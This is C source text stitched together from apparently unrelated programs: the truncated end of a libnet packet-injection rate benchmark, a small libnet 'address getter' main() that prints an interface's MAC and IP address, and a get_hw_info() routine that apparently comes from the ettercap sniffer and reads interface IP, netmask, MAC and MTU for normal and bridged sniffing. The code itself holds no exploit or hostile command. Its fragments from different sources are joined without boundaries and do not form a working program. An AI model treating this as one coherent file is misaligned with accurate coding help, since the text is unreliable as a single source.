sec = (tv2.tv_sec - tv.tv_sec)
- (tv.tv_usec - tv2.tv_usec) / 1000000.0;
printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx,
mark/sec, (data_pushed/1024.0)/sec );
data_pushed = 0;
gettimeofday(&tv, NULL);
}
}
if ((acx-1) % mark) { /* There is a remainder */
gettimeofday(&tv2, NULL);
sec = (tv2.tv_sec - tv.tv_sec)
- (tv.tv_usec - tv2.tv_usec) / 1000000.0;
printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx-1,
((acx-1) % mark)/sec, (data_pushed/1024.0)/sec );
}
libnet_destroy(l);
free( buf );
return ( 0 );
}
int
main(int argc, char *argv[])
{
int c;
u_long i;
libnet_t *l;
char *device = NULL;
struct libnet_ether_addr *e;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 address getter\n");
while ((c = getopt(argc, argv, "i:")) != EOF)
{
switch (c)
{
case 'i':
device = optarg;
break;
default:
exit(EXIT_FAILURE);
}
}
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
device, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
printf("Interface %s\n", libnet_getdevice(l));
e = libnet_get_hwaddr(l);
if (e == NULL)
{
fprintf(stderr, "Can't get hardware address: %s\n", libnet_geterror(l));
}
else
{
printf("MAC address: ");
for (c = 0; c < 6; c++)
{
printf("%x", e->ether_addr_octet[c]);
if (c != 5)
{
printf(":");
}
}
printf("\n");
}
i = libnet_get_ipaddr4(l);
if (i == -1)
{
fprintf(stderr, "Can't get ip address: %s\n", libnet_geterror(l));
}
else
{
printf("IP address: ");
printf("%s\n", libnet_addr2name4(i, LIBNET_DONT_RESOLVE));
}
exit(EXIT_SUCCESS);
}
void get_hw_info(void)
{
u_long ip;
struct libnet_ether_addr *ea;
bpf_u_int32 network, netmask;
char pcap_errbuf[PCAP_ERRBUF_SIZE];
/*
* dont touch the interface reading from file.
* ...and if lnet_L3 is NULL we are sure that
* unoffensive mode is on
*/
if (!GBL_LNET->lnet_L3 || GBL_OPTIONS->read) {
DEBUG_MSG("get_hw_info: skipping... (not initialized)");
return;
}
DEBUG_MSG("get_hw_info");
/* get the ip address */
ip = libnet_get_ipaddr4(GBL_LNET->lnet_L3);
/* if ip is equal to -1 there was an error */
if (ip != (u_long)~0) {
/* the interface has an ip address */
if (ip != 0)
GBL_IFACE->configured = 1;
/* save the ip address */
ip_addr_init(&GBL_IFACE->ip, AF_INET, (char *)&ip);
if (pcap_lookupnet(GBL_OPTIONS->iface, &network, &netmask, pcap_errbuf) == -1)
ERROR_MSG("%s", pcap_errbuf);
ip_addr_init(&GBL_IFACE->network, AF_INET, (char *)&network);
/* the user has specified a different netmask, use it */
if (GBL_OPTIONS->netmask) {
struct in_addr net;
/* sanity check */
if (inet_aton(GBL_OPTIONS->netmask, &net) == 0)
FATAL_ERROR("Invalid netmask %s", GBL_OPTIONS->netmask);
ip_addr_init(&GBL_IFACE->netmask, AF_INET, (char *)&net);
} else
ip_addr_init(&GBL_IFACE->netmask, AF_INET, (char *)&netmask);
} else
DEBUG_MSG("get_hw_info: NO IP on %s", GBL_OPTIONS->iface);
/* get the mac address */
ea = libnet_get_hwaddr(GBL_LNET->lnet);
if (ea != NULL)
memcpy(GBL_IFACE->mac, ea->ether_addr_octet, MEDIA_ADDR_LEN);
else
DEBUG_MSG("get_hw_info: NO MAC for %s", GBL_OPTIONS->iface);
/* get the MTU */
GBL_IFACE->mtu = get_iface_mtu(GBL_OPTIONS->iface);
/* check the mtu */
if (GBL_IFACE->mtu > INT16_MAX)
FATAL_ERROR("MTU too large");
USER_MSG("%6s ->\t%s ", GBL_OPTIONS->iface,
mac_addr_ntoa(GBL_IFACE->mac, pcap_errbuf));
USER_MSG("%16s ", ip_addr_ntoa(&GBL_IFACE->ip, pcap_errbuf));
USER_MSG("%16s\n\n", ip_addr_ntoa(&GBL_IFACE->netmask, pcap_errbuf) );
/* if not in bridged sniffing, return */
if (GBL_SNIFF->type != SM_BRIDGED)
return;
ip = libnet_get_ipaddr4(GBL_LNET->lnet_bridge);
/* if ip is equal to -1 there was an error */
if (ip != (u_long)~0) {
ip_addr_init(&GBL_BRIDGE->ip, AF_INET, (char *)&ip);
if (pcap_lookupnet(GBL_OPTIONS->iface_bridge, &network, &netmask, pcap_errbuf) == -1)
ERROR_MSG("%s", pcap_errbuf);
ip_addr_init(&GBL_BRIDGE->network, AF_INET, (char *)&network);
ip_addr_init(&GBL_BRIDGE->netmask, AF_INET, (char *)&netmask);
} else
DEBUG_MSG("get_hw_info: NO IP on %s", GBL_OPTIONS->iface_bridge);
ea = libnet_get_hwaddr(GBL_LNET->lnet_bridge);
if (ea != NULL)
memcpy(GBL_BRIDGE->mac, ea->ether_addr_octet, MEDIA_ADDR_LEN);
else
DEBUG_MSG("get_hw_info: NO MAC for %s", GBL_OPTIONS->iface_bridge);
/* get the MTU */
GBL_BRIDGE->mtu = get_iface_mtu(GBL_OPTIONS->iface_bridge);
if (GBL_BRIDGE->mtu > INT16_MAX)
FATAL_ERROR("MTU too large");
USER_MSG("%6s ->\t%s ", GBL_OPTIONS->iface_bridge,
mac_addr_ntoa(GBL_BRIDGE->mac, pcap_errbuf));
USER_MSG("%16s ", ip_addr_ntoa(&GBL_BRIDGE->ip, pcap_errbuf));
USER_MSG("%16s\n\n", ip_addr_ntoa(&GBL_BRIDGE->netmask, pcap_errbuf) );
/* some sanity checks */
if (GBL_BRIDGE->mtu != GBL_IFACE->mtu)
FATAL_ERROR("The two interfaces must have the same MTU.");
if (!memcmp(GBL_BRIDGE->mac, GBL_IFACE->mac, MEDIA_ADDR_LEN))
FATAL_ERROR("The two bridged interfaces must be phisically different");
}
